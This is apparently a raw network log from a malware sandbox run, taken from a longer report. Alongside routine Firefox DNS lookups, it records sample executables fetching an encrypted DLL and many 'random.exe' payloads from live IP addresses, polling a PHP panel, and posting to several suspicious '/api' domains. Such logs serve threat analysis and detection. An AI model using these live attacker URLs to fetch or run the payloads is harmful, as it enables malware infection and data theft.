                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN AAAA
                        Response
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN AAAA
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                      • flag-us
                        DNS
                        prod.ads.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.ads.prod.webservices.mozgcp.net
                        IN A
                        Response
                        prod.ads.prod.webservices.mozgcp.net
                        IN A
                        34.117.188.166
                      • flag-us
                        DNS
                        prod.ads.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.ads.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                      • flag-us
                        DNS
                        prod.pocket.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN A
                        Response
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN A
                        34.120.5.221
                      • flag-us
                        DNS
                        prod.pocket.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN AAAA
                        Response
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN AAAA
                        2600:1901:0:524c::
                      • flag-us
                        DNS
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        Response
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        34.117.121.53
                      • flag-us
                        DNS
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                      • flag-gb
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        dee2c68b58.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:48:05 GMT
                        Content-Length: 35588
                        Connection: keep-alive
                        Set-Cookie: sessionid=303bf56227e0b3b78fc80a82; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • flag-us
                        POST
                        https://lev-tolstoi.com/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.157.254:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: lev-tolstoi.com
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=hospcr9mmcv7t58oea5ldmfvo8; expires=Mon, 14 Apr 2025 22:34:45 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kz7RC6KMNsNfX0wpcvUxrNEUSTdVVDC0qAOzq9SkXsn%2Fn%2Fd5yuC50Jf%2FwPhFTY9ZvtNAKn%2FkKDa8cazrpjas%2BWUafSB0psIHPfRBBIl6kjmf7oZPmyMlyHYHFHwiESZ2yKE%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff873f7a7701-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=53953&min_rtt=47301&rtt_var=16342&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=583&delivery_rate=70427&cwnd=253&unsent_bytes=0&cid=1007838723e76cfd&ts=241&x=0"
                      • flag-nl
                        GET
                        http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: 1
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/dll/key
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /dll/key HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: 1
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 21
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/dll/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /dll/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: 1
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                        Content-Length: 97296
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: application/octet-stream
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:13 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:16 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=96
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                      • flag-us
                        DNS
                        prod.balrog.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN A
                        Response
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN A
                        35.244.181.201
                      • flag-us
                        DNS
                        prod.balrog.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN AAAA
                        Response
                      • flag-us
                        DNS
                        prod.balrog.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN AAAA
                      • flag-us
                        DNS
                        ciscobinary.openh264.org
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ciscobinary.openh264.org
                        IN A
                        Response
                        ciscobinary.openh264.org
                        IN CNAME
                        a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                        a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                        IN CNAME
                        a17.rackcdn.com
                        a17.rackcdn.com
                        IN CNAME
                        a17.rackcdn.com.mdc.edgesuite.net
                        a17.rackcdn.com.mdc.edgesuite.net
                        IN CNAME
                        a19.dscg10.akamai.net
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.155
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.209
                      • flag-us
                        DNS
                        ciscobinary.openh264.org
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ciscobinary.openh264.org
                        IN A
                      • flag-gb
                        GET
                        http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                        firefox.exe
                        Remote address:
                        88.221.134.155:80
                        Request
                        GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                        Host: ciscobinary.openh264.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                        Accept: */*
                        Accept-Language: en-US,en;q=0.5
                        Accept-Encoding: gzip, deflate
                        Connection: keep-alive
                        Response
                        HTTP/1.1 200 OK
                        Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                        ETag: 85430baed3398695717b0263807cf97c
                        Content-Length: 453023
                        Accept-Ranges: bytes
                        X-Timestamp: 1731034347.00215
                        Content-Type: application/zip
                        X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                        Cache-Control: public, max-age=97643
                        Expires: Sat, 21 Dec 2024 07:55:41 GMT
                        Date: Fri, 20 Dec 2024 04:48:18 GMT
                        Connection: keep-alive
                      • flag-us
                        DNS
                        a19.dscg10.akamai.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        a19.dscg10.akamai.net
                        IN A
                        Response
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.209
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.155
                      • flag-us
                        DNS
                        a19.dscg10.akamai.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        a19.dscg10.akamai.net
                        IN AAAA
                        Response
                        a19.dscg10.akamai.net
                        IN AAAA
                        2a02:26f0:a1::58dd:869b
                        a19.dscg10.akamai.net
                        IN AAAA
                        2a02:26f0:a1::58dd:86d1
                      • flag-us
                        DNS
                        redirector.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        redirector.gvt1.com
                        IN A
                        Response
                        redirector.gvt1.com
                        IN A
                        172.217.20.174
                      • flag-us
                        DNS
                        redirector.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        redirector.gvt1.com
                        IN A
                        Response
                        redirector.gvt1.com
                        IN A
                        172.217.20.174
                      • flag-us
                        DNS
                        redirector.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        redirector.gvt1.com
                        IN AAAA
                        Response
                        redirector.gvt1.com
                        IN AAAA
                        2a00:1450:4007:80c::200e
                      • flag-us
                        DNS
                        r4---sn-aigzrnsz.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        r4---sn-aigzrnsz.gvt1.com
                        IN A
                        Response
                        r4---sn-aigzrnsz.gvt1.com
                        IN CNAME
                        r4.sn-aigzrnsz.gvt1.com
                        r4.sn-aigzrnsz.gvt1.com
                        IN A
                        74.125.175.169
                      • flag-us
                        DNS
                        r4.sn-aigzrnsz.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        r4.sn-aigzrnsz.gvt1.com
                        IN A
                        Response
                        r4.sn-aigzrnsz.gvt1.com
                        IN A
                        74.125.175.169
                      • flag-us
                        DNS
                        r4.sn-aigzrnsz.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        r4.sn-aigzrnsz.gvt1.com
                        IN AAAA
                        Response
                        r4.sn-aigzrnsz.gvt1.com
                        IN AAAA
                        2a00:1450:4009:1b::9
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:33 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:35 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:37 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:40 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:45 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:47 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:49 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:51 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                      • 185.215.113.43:80
                        http://185.215.113.43/Zu7JuNko/index.php
                        http
                        skotes.exe
                        7.5kB
                        7.0kB
                        52
                        29

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.43/Zu7JuNko/index.php

                        HTTP Response

                        200
                      • 31.41.244.11:80
                        http://31.41.244.11/files/unique2/random.exe
                        http
                        skotes.exe
                        525.2kB
                        29.7MB
                        11065
                        31100

                        HTTP Request

                        GET http://31.41.244.11/files/fate/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/london/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/wicked/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/geopoxid/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/unique3/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/lolz/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/burpin1/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/unique1/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/martin/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/bckosq/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/loadman/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/x3team/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/karl/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://31.41.244.11/files/unique2/random.exe

                        HTTP Response

                        200
                      • 172.67.209.202:443
                        https://pancakedipyps.click/api
                        tls, http
                        823e4bdbcb.exe
                        983 B
                        4.5kB
                        9
                        9

                        HTTP Request

                        POST https://pancakedipyps.click/api

                        HTTP Response

                        200
                      • 172.67.197.170:443
                        https://discokeyus.lat/api
                        tls, http
                        823e4bdbcb.exe
                        978 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://discokeyus.lat/api

                        HTTP Response

                        200
                      • 172.67.215.121:443
                        https://necklacebudi.lat/api
                        tls, http
                        823e4bdbcb.exe
                        980 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://necklacebudi.lat/api

                        HTTP Response

                        200
                      • 104.21.64.1:443
                        https://energyaffai.lat/api
                        tls, http
